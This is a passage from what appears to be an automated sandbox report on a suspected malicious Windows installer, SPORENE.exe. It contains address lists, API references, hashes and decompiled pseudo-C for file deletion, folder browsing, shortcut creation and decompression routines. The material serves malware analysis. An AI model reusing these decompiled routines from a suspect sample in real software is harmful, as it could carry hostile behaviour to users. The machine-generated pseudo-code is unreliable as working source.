                0x00404c64
                0x00404c7f
                0x00404c66
                0x00404c6f
                0x00404c6f
                0x00404c64
                0x00404c84
                0x00404c89
                0x00404c8e
                0x00404c97
                0x00404c97
                0x00404ca0
                0x00404ca2
                0x00404ca2
                0x00404cae
                0x00404cb6
                0x00404cc0
                0x00404cc0
                0x00404cc5
                0x00000000
                0x00404cc5
                0x00404b6f
                0x00404b26
                0x00404b2d
                0x00000000
                0x00000000
                0x00000000
                0x00404b2d
                0x00404a4c
                0x00404a55
                0x00404a6f
                0x00404a74
                0x00404a7e
                0x00404a85
                0x00404a91
                0x00404a94
                0x00404a97
                0x00404a9e
                0x00404aa6
                0x00404aa9
                0x00404aad
                0x00404ab4
                0x00404abc
                0x00404b16
                0x00404abe
                0x00404abf
                0x00404ac6
                0x00404ad0
                0x00404ad8
                0x00404ae5
                0x00404af9
                0x00404afd
                0x00404afd
                0x00404af9
                0x00404b02
                0x00404b0f
                0x00404b0f
                0x00404abc
                0x00000000
                0x00404a74
                0x00404a62
                0x00000000
                0x00000000
                0x00404a68
                0x00000000
                0x004049d3
                0x004049e0
                0x004049e9
                0x004049f6
                0x004049f6
                0x004049fd
                0x00404a03
                0x00404a0c
                0x00404a0f
                0x00404a12
                0x00404a1a
                0x00404a1d
                0x00404a20
                0x00404a26
                0x00404a2d
                0x00404a34
                0x00404ccb
                0x00404cdd
                0x00404a3a
                0x00404a3d
                0x00000000
                0x00404a3d
                0x00404a34

                APIs
                • GetDlgItem.USER32 ref: 004049D9
                • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\SPORENE.exe,0042D268,00000000,?,?), ref: 00404AF1
                • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\SPORENE.exe), ref: 00404AFD
                • SetDlgItemTextW.USER32 ref: 00404B0F
                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                  • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                  • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                  • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\SPORENE.exe
                • API String ID: 2624150263-3330946844
                • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                				signed int _v8;
                				signed int _v12;
                				short _v556;
                				short _v558;
                				struct _WIN32_FIND_DATAW _v604;
                				signed int _t38;
                				signed int _t52;
                				signed int _t55;
                				signed int _t62;
                				void* _t64;
                				signed char _t65;
                				WCHAR* _t66;
                				void* _t67;
                				WCHAR* _t68;
                				void* _t70;
                
                				_t65 = _a8;
                				_t68 = _a4;
                				_v8 = _t65 & 0x00000004;
                				_t38 = E00405F14(__eflags, _t68);
                				_v12 = _t38;
                				if((_t65 & 0x00000008) != 0) {
                					_t62 = DeleteFileW(_t68);
                					asm("sbb eax, eax");
                					_t64 =  ~_t62 + 1;
                					 *0x434f88 =  *0x434f88 + _t64;
                					return _t64;
                				}
                				_a4 = _t65;
                				_t8 =  &_a4;
                				 *_t8 = _a4 & 0x00000001;
                				__eflags =  *_t8;
                				if( *_t8 == 0) {
                					L5:
                					E0040653D(0x42f270, _t68);
                					__eflags = _a4;
                					if(_a4 == 0) {
                						E00405E58(_t68);
                					} else {
                						lstrcatW(0x42f270, L"\\*.*");
                					}
                					__eflags =  *_t68;
                					if( *_t68 != 0) {
                						L10:
                						lstrcatW(_t68, 0x40a014);
                						L11:
                						_t66 =  &(_t68[lstrlenW(_t68)]);
                						_t38 = FindFirstFileW(0x42f270,  &_v604);
                						_t70 = _t38;
                						__eflags = _t70 - 0xffffffff;
                						if(_t70 == 0xffffffff) {
                							L26:
                							__eflags = _a4;
                							if(_a4 != 0) {
                								_t30 = _t66 - 2;
                								 *_t30 =  *(_t66 - 2) & 0x00000000;
                								__eflags =  *_t30;
                							}
                							goto L28;
                						} else {
                							goto L12;
                						}
                						do {
                							L12:
                							__eflags = _v604.cFileName - 0x2e;
                							if(_v604.cFileName != 0x2e) {
                								L16:
                								E0040653D(_t66,  &(_v604.cFileName));
                								__eflags = _v604.dwFileAttributes & 0x00000010;
                								if(__eflags == 0) {
                									_t52 = E00405C01(__eflags, _t68, _v8);
                									__eflags = _t52;
                									if(_t52 != 0) {
                										E0040559F(0xfffffff2, _t68);
                									} else {
                										__eflags = _v8 - _t52;
                										if(_v8 == _t52) {
                											 *0x434f88 =  *0x434f88 + 1;
                										} else {
                											E0040559F(0xfffffff1, _t68);
                											E004062FD(_t67, _t68, 0);
                										}
                									}
                								} else {
                									__eflags = (_a8 & 0x00000003) - 3;
                									if(__eflags == 0) {
                										E00405C49(__eflags, _t68, _a8);
                									}
                								}
                								goto L24;
                							}
                							__eflags = _v558;
                							if(_v558 == 0) {
                								goto L24;
                							}
                							__eflags = _v558 - 0x2e;
                							if(_v558 != 0x2e) {
                								goto L16;
                							}
                							__eflags = _v556;
                							if(_v556 == 0) {
                								goto L24;
                							}
                							goto L16;
                							L24:
                							_t55 = FindNextFileW(_t70,  &_v604);
                							__eflags = _t55;
                						} while (_t55 != 0);
                						_t38 = FindClose(_t70);
                						goto L26;
                					}
                					__eflags =  *0x42f270 - 0x5c;
                					if( *0x42f270 != 0x5c) {
                						goto L11;
                					}
                					goto L10;
                				} else {
                					__eflags = _t38;
                					if(_t38 == 0) {
                						L28:
                						__eflags = _a4;
                						if(_a4 == 0) {
                							L36:
                							return _t38;
                						}
                						__eflags = _v12;
                						if(_v12 != 0) {
                							_t38 = E00406873(_t68);
                							__eflags = _t38;
                							if(_t38 == 0) {
                								goto L36;
                							}
                							E00405E0C(_t68);
                							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                							__eflags = _t38;
                							if(_t38 != 0) {
                								return E0040559F(0xffffffe5, _t68);
                							}
                							__eflags = _v8;
                							if(_v8 == 0) {
                								goto L30;
                							}
                							E0040559F(0xfffffff1, _t68);
                							return E004062FD(_t67, _t68, 0);
                						}
                						L30:
                						 *0x434f88 =  *0x434f88 + 1;
                						return _t38;
                					}
                					__eflags = _t65 & 0x00000002;
                					if((_t65 & 0x00000002) == 0) {
                						goto L28;
                					}
                					goto L5;
                				}
                			}


















                0x00405c53
                0x00405c58
                0x00405c61
                0x00405c64
                0x00405c6c
                0x00405c6f
                0x00405c72
                0x00405c7a
                0x00405c7c
                0x00405c7d
                0x00000000
                0x00405c7d
                0x00405c88
                0x00405c8b
                0x00405c8b
                0x00405c8b
                0x00405c8f
                0x00405ca2
                0x00405ca9
                0x00405cae
                0x00405cb2
                0x00405cc2
                0x00405cb4
                0x00405cba
                0x00405cba
                0x00405cc7
                0x00405ccb
                0x00405cd7
                0x00405cdd
                0x00405ce2
                0x00405ce8
                0x00405cf3
                0x00405cf9
                0x00405cfb
                0x00405cfe
                0x00405da8
                0x00405da8
                0x00405dac
                0x00405dae
                0x00405dae
                0x00405dae
                0x00405dae
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405d04
                0x00405d04
                0x00405d04
                0x00405d0c
                0x00405d2c
                0x00405d34
                0x00405d39
                0x00405d40
                0x00405d5b
                0x00405d60
                0x00405d62
                0x00405d86
                0x00405d64
                0x00405d64
                0x00405d67
                0x00405d7b
                0x00405d69
                0x00405d6c
                0x00405d74
                0x00405d74
                0x00405d67
                0x00405d42
                0x00405d48
                0x00405d4a
                0x00405d50
                0x00405d50
                0x00405d4a
                0x00000000
                0x00405d40
                0x00405d0e
                0x00405d16
                0x00000000
                0x00000000
                0x00405d18
                0x00405d20
                0x00000000
                0x00000000
                0x00405d22
                0x00405d2a
                0x00000000
                0x00000000
                0x00000000
                0x00405d8b
                0x00405d93
                0x00405d99
                0x00405d99
                0x00405da2
                0x00000000
                0x00405da2
                0x00405ccd
                0x00405cd5
                0x00000000
                0x00000000
                0x00000000
                0x00405c91
                0x00405c91
                0x00405c93
                0x00405db3
                0x00405db5
                0x00405db8
                0x00405e09
                0x00405e09
                0x00405e09
                0x00405dba
                0x00405dbd
                0x00405dc8
                0x00405dcd
                0x00405dcf
                0x00000000
                0x00000000
                0x00405dd2
                0x00405dde
                0x00405de3
                0x00405de5
                0x00000000
                0x00405e00
                0x00405de7
                0x00405dea
                0x00000000
                0x00000000
                0x00405def
                0x00000000
                0x00405df6
                0x00405dbf
                0x00405dbf
                0x00000000
                0x00405dbf
                0x00405c99
                0x00405c9c
                0x00000000
                0x00000000
                0x00000000
                0x00405c9c

                APIs
                • DeleteFileW.KERNEL32(?,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,747DFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                • FindClose.KERNEL32(00000000), ref: 00405DA2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                • API String ID: 2035342205-2424138518
                • Opcode ID: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                • Opcode Fuzzy Hash: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 67%
                			E004021AA(void* __eflags) {
                				signed int _t52;
                				void* _t56;
                				intOrPtr* _t60;
                				intOrPtr _t61;
                				intOrPtr* _t62;
                				intOrPtr* _t64;
                				intOrPtr* _t66;
                				intOrPtr* _t68;
                				intOrPtr* _t70;
                				intOrPtr* _t72;
                				intOrPtr* _t74;
                				intOrPtr* _t76;
                				intOrPtr* _t78;
                				intOrPtr* _t80;
                				void* _t83;
                				intOrPtr* _t91;
                				signed int _t101;
                				signed int _t105;
                				void* _t107;
                
                				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                				_t52 =  *(_t107 - 0x20);
                				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                				_t101 = _t52 & 0x00008000;
                				_t105 = _t52 >> 0x0000000c & 0x00000007;
                				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                					E00402DA6(0x21);
                				}
                				_t56 = _t107 + 8;
                				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                				if(_t56 < _t83) {
                					L14:
                					 *((intOrPtr*)(_t107 - 4)) = 1;
                					_push(0xfffffff0);
                				} else {
                					_t60 =  *((intOrPtr*)(_t107 + 8));
                					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                					if(_t61 >= _t83) {
                						_t64 =  *((intOrPtr*)(_t107 + 8));
                						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                						if(_t101 == _t83) {
                							_t80 =  *((intOrPtr*)(_t107 + 8));
                							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\engineer\\AppData\\Local\\Temp");
                						}
                						if(_t105 != _t83) {
                							_t78 =  *((intOrPtr*)(_t107 + 8));
                							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                						}
                						_t66 =  *((intOrPtr*)(_t107 + 8));
                						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                						if( *_t91 != _t83) {
                							_t76 =  *((intOrPtr*)(_t107 + 8));
                							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                						}
                						_t68 =  *((intOrPtr*)(_t107 + 8));
                						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                						_t70 =  *((intOrPtr*)(_t107 + 8));
                						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                						}
                						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                						 *((intOrPtr*)( *_t72 + 8))(_t72);
                					}
                					_t62 =  *((intOrPtr*)(_t107 + 8));
                					 *((intOrPtr*)( *_t62 + 8))(_t62);
                					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                						_push(0xfffffff4);
                					} else {
                						goto L14;
                					}
                				}
                				E00401423();
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                				return 0;
                			}






















                0x004021b3
                0x004021bd
                0x004021c7
                0x004021d1
                0x004021dc
                0x004021df
                0x004021f9
                0x004021fc
                0x00402202
                0x00402205
                0x0040220f
                0x00402213
                0x00402213
                0x00402218
                0x00402229
                0x00402231
                0x004022e8
                0x004022e8
                0x004022ef
                0x00402237
                0x00402237
                0x00402246
                0x0040224a
                0x0040224d
                0x00402253
                0x00402261
                0x00402264
                0x00402266
                0x00402271
                0x00402271
                0x00402276
                0x00402278
                0x0040227f
                0x0040227f
                0x00402282
                0x0040228b
                0x0040228e
                0x00402294
                0x00402296
                0x004022a0
                0x004022a0
                0x004022a3
                0x004022ac
                0x004022af
                0x004022b8
                0x004022be
                0x004022c0
                0x004022ce
                0x004022ce
                0x004022d1
                0x004022d7
                0x004022d7
                0x004022da
                0x004022e0
                0x004022e6
                0x004022fb
                0x00000000
                0x00000000
                0x00000000
                0x004022e6
                0x004022f1
                0x00402c2d
                0x00402c39

                APIs
                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CreateInstance
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 542301482-1104044542
                • Opcode ID: 9a16952c8782792dfdad3a69a6f35c28fddbdbcb44169e511551d3235c99febb
                • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                • Opcode Fuzzy Hash: 9a16952c8782792dfdad3a69a6f35c28fddbdbcb44169e511551d3235c99febb
                • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 39%
                			E0040290B(short __ebx, short* __edi) {
                				void* _t21;
                
                				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                					_push(_t21 - 0x2b0);
                					_push(__edi);
                					E0040653D();
                				} else {
                					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                					 *__edi = __ebx;
                					 *((intOrPtr*)(_t21 - 4)) = 1;
                				}
                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                				return 0;
                			}




                0x00402923
                0x0040293e
                0x00402949
                0x0040294a
                0x00402a94
                0x00402925
                0x00402928
                0x0040292b
                0x0040292e
                0x0040292e
                0x00402c2d
                0x00402c39

                APIs
                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileFindFirst
                • String ID:
                • API String ID: 1974802433-0
                • Opcode ID: 6ddf66d317f864cf93ed55985cb47f36fb1104e014878ba6b3b46bd2b1a0b40f
                • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                • Opcode Fuzzy Hash: 6ddf66d317f864cf93ed55985cb47f36fb1104e014878ba6b3b46bd2b1a0b40f
                • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E00406D85(signed int __ebx, signed int* __esi) {
                				signed int _t367;
                				signed int _t396;
                				signed int _t413;
                				signed int _t414;
                				signed int* _t417;
                				void* _t419;
                
                				L0:
                				while(1) {
                					L0:
                					_t417 = __esi;
                					_t396 = __ebx;
                					if( *(_t419 - 0x34) == 0) {
                						break;
                					}
                					L55:
                					__eax =  *(__ebp - 0x38);
                					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                					__ecx = __ebx;
                					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                					__ebx = __ebx + 8;
                					while(1) {
                						L56:
                						if(__ebx < 0xe) {
                							goto L0;
                						}
                						L57:
                						__eax =  *(__ebp - 0x40);
                						__eax =  *(__ebp - 0x40) & 0x00003fff;
                						__ecx = __eax;
                						__esi[1] = __eax;
                						__ecx = __eax & 0x0000001f;
                						if(__cl > 0x1d) {
                							L9:
                							_t414 = _t413 | 0xffffffff;
                							 *_t417 = 0x11;
                							L10:
                							_t417[0x147] =  *(_t419 - 0x40);
                							_t417[0x146] = _t396;
                							( *(_t419 + 8))[1] =  *(_t419 - 0x34);
                							L11:
                							 *( *(_t419 + 8)) =  *(_t419 - 0x38);
                							_t417[0x26ea] =  *(_t419 - 0x30);
                							E004074F4( *(_t419 + 8));
                							return _t414;
                						}
                						L58:
                						__eax = __eax & 0x000003e0;
                						if(__eax > 0x3a0) {
                							goto L9;
                						}
                						L59:
                						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                						__ebx = __ebx - 0xe;
                						_t94 =  &(__esi[2]);
                						 *_t94 = __esi[2] & 0x00000000;
                						 *__esi = 0xc;
                						while(1) {
                							L60:
                							__esi[1] = __esi[1] >> 0xa;
                							__eax = (__esi[1] >> 0xa) + 4;
                							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                								goto L68;
                							}
                							L61:
                							while(1) {
                								L64:
                								if(__ebx >= 3) {
                									break;
                								}
                								L62:
                								if( *(__ebp - 0x34) == 0) {
                									goto L159;
                								}
                								L63:
                								__eax =  *(__ebp - 0x38);
                								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                								__ecx = __ebx;
                								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                								__ebx = __ebx + 8;
                							}
                							L65:
                							__ecx = __esi[2];
                							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                							__ebx = __ebx - 3;
                							_t108 = __ecx + 0x4084d4; // 0x121110
                							__ecx =  *_t108;
                							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                							__ecx = __esi[1];
                							__esi[2] = __esi[2] + 1;
                							__eax = __esi[2];
                							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                								goto L64;
                							}
                							L66:
                							while(1) {
                								L68:
                								if(__esi[2] >= 0x13) {
                									break;
                								}
                								L67:
                								_t119 = __esi[2] + 0x4084d4; // 0x4000300
                								__eax =  *_t119;
                								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                								_t126 =  &(__esi[2]);
                								 *_t126 = __esi[2] + 1;
                							}
                							L69:
                							__ecx = __ebp - 8;
                							__edi =  &(__esi[0x143]);
                							 &(__esi[0x148]) =  &(__esi[0x144]);
                							__eax = 0;
                							 *(__ebp - 8) = 0;
                							__eax =  &(__esi[3]);
                							 *__edi = 7;
                							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                							if(__eax != 0) {
                								L72:
                								 *__esi = 0x11;
                								while(1) {
                									L157:
                									_t367 =  *_t417;
                									if(_t367 > 0xf) {
                										break;
                									}
                									L1:
                									switch( *((intOrPtr*)(_t367 * 4 +  &M004074B4))) {
                										case 0:
                											L101:
                											__eax = __esi[4] & 0x000000ff;
                											__esi[3] = __esi[4] & 0x000000ff;
                											__eax = __esi[5];
                											__esi[2] = __esi[5];
                											 *__esi = 1;
                											goto L102;
                										case 1:
                											L102:
                											__eax = __esi[3];
                											while(1) {
                												L105:
                												__eflags = __ebx - __eax;
                												if(__ebx >= __eax) {
                													break;
                												}
                												L103:
                												__eflags =  *(__ebp - 0x34);
                												if( *(__ebp - 0x34) == 0) {
                													goto L159;
                												}
                												L104:
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                												__ecx = __ebx;
                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                												__ebx = __ebx + 8;
                												__eflags = __ebx;
                											}
                											L106:
                											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                											__eax = __eax &  *(__ebp - 0x40);
                											__ecx = __esi[2];
                											__eax = __esi[2] + __eax * 4;
                											__ecx =  *(__eax + 1) & 0x000000ff;
                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                											__ecx =  *__eax & 0x000000ff;
                											__eflags = __ecx;
                											if(__ecx != 0) {
                												L108:
                												__eflags = __cl & 0x00000010;
                												if((__cl & 0x00000010) == 0) {
                													L110:
                													__eflags = __cl & 0x00000040;
                													if((__cl & 0x00000040) == 0) {
                														goto L125;
                													}
                													L111:
                													__eflags = __cl & 0x00000020;
                													if((__cl & 0x00000020) == 0) {
                														goto L9;
                													}
                													L112:
                													 *__esi = 7;
                													goto L157;
                												}
                												L109:
                												__esi[2] = __ecx;
                												__esi[1] = __eax;
                												 *__esi = 2;
                												goto L157;
                											}
                											L107:
                											__esi[2] = __eax;
                											 *__esi = 6;
                											goto L157;
                										case 2:
                											L113:
                											__eax = __esi[2];
